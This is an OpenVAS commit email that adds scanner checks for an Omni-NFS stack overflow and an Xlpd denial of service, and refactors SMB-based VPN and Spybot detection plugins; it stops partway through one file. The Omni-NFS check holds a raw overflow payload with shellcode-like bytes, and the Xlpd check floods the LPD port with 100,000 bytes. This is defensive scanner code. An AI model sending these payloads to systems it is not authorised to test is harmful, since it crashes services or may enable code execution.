[Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Oct 8 20:03:38 CEST 2009
Author: mime
Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009)
New Revision: 5443
Added:
trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
trunk/openvas-plugins/scripts/Xlpd_36610.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/cve_current.txt
trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
trunk/openvas-plugins/scripts/secpod_smb_func.inc
trunk/openvas-plugins/scripts/smb_explorer_version.nasl
trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
trunk/openvas-plugins/scripts/spybot_detection.nasl
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/ChangeLog 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,5 +1,21 @@
2009-10-08 Michael Meyer <michael.meyer at intevation.de>
+ * scripts/Xlpd_36610.nasl,
+ scripts/Omni_NFS_36608.nasl:
+ Added new plugins.
+
+ * scripts/spybot_detection.nasl,
+ scripts/cisco_vpn_client_detect.nasl,
+ scripts/smb_explorer_version.nasl,
+ scripts/sonicwall_vpn_client_detect.nasl:
+ Modified so that they don't need smb_func.inc
+ anymore.
+
+ * scripts/secpod_smb_func.inc:
+ Added function GetVersionFromFile().
+
+2009-10-08 Michael Meyer <michael.meyer at intevation.de>
+
* scripts/showmount.nasl:
Added script_copyright().
Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/cve_current.txt 2009-10-08 18:03:34 UTC (rev 5443)
@@ -119,3 +119,5 @@
CVE-2009-3562 SecPod
CVE-2009-3561 SecPod
CVE-2009-3525 SecPod
+36610 Greenbone svn R
+36608 Greenbone svn R
Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,123 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100297);
+ script_bugtraq_id(36608);
+ script_version ("1.0-$Revision$");
+
+ script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities");
+
+desc = "Overview:
+Omni-NFS is prone to multiple stack-based buffer-overflow
+vulnerabilities because the application fails to properly bounds-check
+user-supplied network data before copying it into an insufficiently
+sized memory buffer. The issues affect both server and client.
+
+Exploiting these issues allows attackers to execute arbitrary machine
+code in the context of users running the affected application. Failed
+attempts will likely crash the application, resulting in denial-of-
+service conditions.
+
+Omni-NFS 5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36608
+http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow");
+ script_category(ACT_DENIAL);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/ftp");
+if(!port)port = 21;
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+if(!get_port_state(port))exit(0);
+
+banner = get_ftp_banner(port:port);
+
+if("XLINK" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+crapdata = crap(length:30000);
+
+req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39,
+0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10,
+0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40,
+0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37,
+0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c,
+0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a,
+0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35,
+0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32,
+0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87,
+0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09,
+0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76,
+0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24,
+0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0,
+0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff,
+0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1,
+0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33,
+0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a);
+
+send(socket:soc, data:req);
+close(soc);
+
+sleep(10);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+
+} else {
+
+ for(i=0;i<5;i++) {
+ if(!ftp_recv_line(socket:soc1)) {
+ security_warning(port:port);
+ close(soc1);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Xlpd Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100296);
+ script_bugtraq_id(36610);
+ script_version ("1.0-$Revision$");
+
+ script_name("Xlpd Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Xlpd is prone to a denial-of-service vulnerability because it fails to
+adequately validate user-supplied input.
+
+An attacker can exploit this issue to crash the affected application,
+denying service to legitimate users. Given the nature of this issue,
+the attacker may also be able to run arbitrary code, but this has not
+been confirmed.
+
+Xlpd 3.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36610
+http://www.netsarang.com/products/xlp_detail.html
+http://www.securityfocus.com/archive/1/507029
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability");
+ script_category(ACT_DENIAL);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/lpd", 515);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/lpd");
+if(!port)port="515";
+
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = crap(data:raw_string(0x41),length:100000);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+} else {
+ close(soc1);
+}
+
+exit(0);
+
Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,31 +1,7 @@
-#
# Script Written By Ferdy Riphagen
# Script distributed under the GNU GPLv2 License.
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
-desc = "
-Synopsis :
-
-There is a VPN client installed on the remote Windows host.
-
-Description :
-
-The Cisco VPN Client is installed on the remote Windows host. This
-software can be used for secure connectivity.
-
-See also :
-
-http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html
-
-Risk factor :
-
-None";
-
if (description) {
script_id(80037);
script_version("$Revision: 1.5 $");
@@ -33,107 +9,45 @@
name = "Cisco VPN Client Version Detection";
script_name(name);
+
+ desc = "Overview: This script is detects the installed version of Cisco VPN
+ Client and sets the result in KB.
+
+ Risk Factor: Informational";
+
summary = "Detects the version number of the Cisco VPN Client in use";
script_summary(summary);
script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen");
-
script_require_ports(139, 445);
script_dependencies("secpod_reg_enum.nasl");
script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport");
exit(0);
}
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-function cleanup(opt) {
-
- if (opt == 1) exit(0);
- else if (opt == 2) {
- NetUseDel();
- exit(0);
- }
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
}
-# modified 'get_dword' to get the bytes in the right format.
-function get_dword2(blob, pos) {
- global_var blob, pos;
-
- if (pos > (strlen(blob) - 4)) return NULL;
- return (ord(blob[pos]) << 16) +
- (ord(blob[pos+1]) << 24) +
- (ord(blob[pos+2])) +
- (ord(blob[pos+3]) << 8);
+if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){
+ exit(0);
}
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if (ipc != 1) cleanup(opt:2);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) cleanup(opt:2);
-
key = "SOFTWARE\Cisco Systems\VPN Client";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- value = RegQueryValue(handle:regopen, item:"InstallPath");
- RegCloseKey(handle:regopen);
- RegCloseKey(handle:hklm);
- if(!isnull(value)) path = value[1];
- else cleanup(opt:2);
-}
-else cleanup(opt:2);
+path = registry_get_sz(key:key, item:"InstallPath");
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) cleanup(opt:1);
-
-fopen = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-
-if (isnull(fopen)) cleanup(opt:2);
-ret = GetFileVersionEx(handle:fopen);
-CloseFile(handle:fopen);
-
-if (!isnull(ret)) children = ret['Children'];
-if (!isnull(children)) info = children['VarFileInfo'];
-if (isnull(info)) cleanup(opt:2);
-
-trans = toupper(hexstr(dec2hex(
- num:get_dword2(
- blob:info['Translation'], pos:0))));
-if (isnull(trans)) cleanup(opt:2);
-
-fileinfo = children['StringFileInfo'];
-if (!isnull(fileinfo)) data = fileinfo[trans];
-if (!isnull(data)) ver = data['ProductVersion'];
-
-if (!isnull(ver)) {
- set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver);
- report = string(
- desc, "\n\n",
- "Plugin output :\n\n",
- "Version ", ver, " of the Cisco VPN Client is installed.\n"
- );
- security_note(port:port, data:report);
+if(path)
+{
+ file = path + "\vpngui.exe";
+ version = GetVersionFromFile(file:file,verstr:"prod");
+ if(!isnull(version)){
+ set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version);
+ exit(0);
+ }
}
-cleanup(opt:2);
+
+exit(0);
Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 18:03:34 UTC (rev 5443)
@@ -695,3 +695,64 @@
(ord(data[2]) << 16) + (ord(data[3]) << 24));
}
}
+
+function GetVersionFromFile(file, verstr) {
+
+ local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver;
+
+ mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file);
+ file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file);
+
+ soc = open_sock_tcp(port);
+ if(!soc){
+ return NULL;
+ }
+
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+ domain:domain, prot:prot);
+ if(!r)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare);
+
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+ close(soc);
+ return NULL;
+ }
+ fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);
+ if(!fid)
+ {
+ close(soc);
+ return NULL;
+ }
+ if(isnull(verstr)) {
+ ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);
+ } else {
+ ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr);
+ }
+ close(soc);
+
+ return ver;
+
+
+}
Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -97,7 +97,7 @@
#==================================================================#
# Main code #
#==================================================================#
-include("smb_func.inc");
+
warning = 0;
access = get_kb_item("SMB/registry_full_access");
Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,34 +1,17 @@
#
# Script Written By Ferdy Riphagen
# Script distributed under the GNU GPLv2 License.
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
if (description) {
script_id(80044);
script_version("$Revision: 1.1 $");
- desc = "
-Synopsis :
+ desc = "Overview: This script detects the installed version of
+SonicWall Global VPN Client and sets the result in KB.
-There is a VPN client installed on the remote host.
+Risk Factor: Informational";
-Description :
-
-The SonicWall Global VPN Client is installed on the remote system. This
-software can be used to establish secure remote connections.
-
-See also :
-
-http://www.sonicwall.com/
-
-Risk factor :
-
-None";
script_description(desc);
name = "SonicWall Global VPN Client Detection";
@@ -37,7 +20,7 @@
script_summary(summary);
script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen");
script_require_ports(139, 445);
@@ -46,83 +29,30 @@
exit(0);
}
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if (ipc != 1) exit(0);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) {
- NetUseDel();
- exit(0);
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
}
-path = NULL;
key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- value = RegQueryValue(handle:regopen, item:"Path");
- RegCloseKey(handle:regopen);
- RegCloseKey(handle:hklm);
- if(!isnull(value)) path = value[1];
-}
-if (isnull(path)) {
- RegCloseKey(handle:hklm);
- NetUseDel();
- exit(0);
-}
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) {
- NetUseDel();
- exit(0);
+if(!registry_key_exists(key:key)){
+ exit(0);
}
-fopen = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
+path = registry_get_sz(key:key, item:"Path");
-if (isnull(fopen)) {
- NetUseDel();
- exit(0);
-}
+if(path) {
-ret = GetFileVersion(handle:fopen);
-CloseFile(handle:fopen);
-NetUseDel();
+ file = path + "\SWGVpnClient.exe";
+ version = GetVersionFromFile(file:file,verstr:"prod");
+ if(!isnull(version)){
+ set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version);
+ set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
+ exit(0);
+ }
+}
-if (!isnull(ret))
-{
- ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]);
-
- set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver);
- set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
-
- report = string("\n",
- "Version ", ver, " of the SonicWall Global VPN Client is installed\n",
- "under :\n",
- "\n",
- " ", path
- );
- security_note(port:port, extra:report);
-}
exit(0);
Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,15 +1,9 @@
#
# (C) Josh Zlatin-Amishav and Tenable Network Security
# GPLv2
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation,de>
- desc = "
-Synopsis :
+ desc = "Synopsis :
The remote Windows host has a spyware detection program installed on it.
@@ -20,11 +14,9 @@
kinds from your computer.
See also :
-
http://www.safer-networking.org/
Risk factor :
-
None";
if(description)
@@ -34,195 +26,175 @@
name = "Spybot Search & Destroy Detection";
script_name(name);
-
+
script_description(desc);
-
+
summary = "Checks whether Spybot Search & Destroy is installed";
script_summary(summary);
script_category(ACT_GATHER_INFO);
-
+
script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security");
- family = "Windows";
+ family = "Service detection";
script_family(family);
-
+
script_dependencies("secpod_reg_enum.nasl");
- script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
+ script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
script_require_ports(139, 445);
exit(0);
}
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
+include("global_settings.inc");
-include("smb_func.inc");
-include("secpod_reg.inc");
+ if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
+ }
+ name = kb_smb_name();
+ login = kb_smb_login();
+ pass = kb_smb_password();
+ domain = kb_smb_domain();
+ port = kb_smb_transport();
-name = kb_smb_name();
-login = kb_smb_login();
-pass = kb_smb_password();
-domain = kb_smb_domain();
-port = kb_smb_transport();
+ if(!port) port = 139;
+ if(!get_port_state(port))exit(0);
-if(!get_port_state(port))exit(0);
-soc = open_sock_tcp(port);
-if(!soc)exit(1);
+ soc = open_sock_tcp(port);
+ if(!soc){
+ exit(0);
+ }
-session_init(socket:soc, hostname:name);
-r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if ( r != 1 )
-{
- NetUseDel();
- exit(0);
-}
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+ close(soc);
+ exit(0);
+ }
-# First find where the executable is installed on the remote host
-# Connect to remote registry.
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm))
-{
- if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0);
- NetUseDel();
- exit(0);
-}
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+ domain:domain, prot:prot);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$");
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+ close(soc);
+ exit(0);
+ }
-# Determine where Spybot S&D is installed
-key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1";
-key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(key_h)) {
- value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path");
- if (!isnull(value)) path = value[1];
- else path = NULL;
-
- RegCloseKey(handle:key_h);
-}
-else path = NULL;
-RegCloseKey(handle:hklm);
+ r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg");
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
-if (isnull(path)) {
- NetUseDel();
- exit(0);
-}
+ pipe = smbntcreatex_extract_pipe(reply:r);
+ if(!pipe)
+ {
+ close(soc);
+ exit(0);
+ }
+ r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
-# Get the file version / latest sigs.
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SpybotSD.exe", string:path);
-rules = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\Updates\downloaded.ini", string:path);
-
-r = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (r != 1) {
- if (log_verbosity > 1) debug_print("can't connect to the remote share (", r, ")!", level:0);
- NetUseDel();
- exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+ close(soc);
+ exit(0);
+ }
-fh = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
- if (log_verbosity > 1) debug_print("can't open ", exe, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+ close(soc);
+ exit(0);
+ }
-version = GetFileVersion(handle:fh);
-CloseFile(handle:fh);
-if (isnull(version))
-{
- if (log_verbosity > 1) debug_print("can't get file version for ", exe, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
+ key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,
+ key:key, reply:handle);
+ if(!key_h)
+ {
+ exit(0);
+ }
+
+ enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid,
+ pipe:pipe, reply:key_h);
-ver = string(version[0], ".", version[1], ".", version[2], ".", version[3]);
-set_kb_item(name:"SMB/SpybotSD/version", value:ver);
+ foreach entry (enumKeys)
+ {
+ tmp = registry_get_sz(item:"DisplayName", key:key + entry);
+ if("Spybot" >< tmp) {
-# Get release date info about the detection rules (includes.zip)
-fh = CreateFile(
- file:rules,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
- if (log_verbosity > 1) debug_print("can't open ", rules, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ version = registry_get_sz(item:"DisplayVersion", key:key + entry);
+ if(!isnull(version)) {
+ set_kb_item(name:"SMB/SpybotSD/version", value:version);
+ }
-contents = ReadFile(handle:fh, offset:0, length:85);
-CloseFile(handle:fh);
-if (isnull(contents))
-{
- if (log_verbosity > 1) debug_print("can't read ", rules, "!", level:0);
- NetUseDel();
- exit(0);
-}
-NetUseDel();
+ path = registry_get_sz(item:"InstallLocation", key:key + entry);
+
+ if(path) {
+ path += "Updates";
+ share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path);
+ path = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path);
+ file = path + "\downloaded.ini";
+
+ contents = read_file(file:file, share:share, offset:0, count:85);
-sigs_target = strstr(contents, "ReleaseDate=");
-if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
-if (isnull(sigs_target)) sigs_target = "n/a";
+ if(contents && "ReleaseDate" >< contents) {
-if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
- a = split(sigs_target, sep:"-", keep:0);
- sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
- sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
-}
-else sigs_target_mmddyyyy = "n/a";
+ sigs_target = strstr(contents, "ReleaseDate=");
+ if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
+ if (isnull(sigs_target)) sigs_target = "n/a";
+ if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
+ a = split(sigs_target, sep:"-", keep:0);
+ sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
+ sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
+ }
+ else sigs_target_mmddyyyy = "n/a";
-sigs_vendor_yyyymmdd = "20080924";
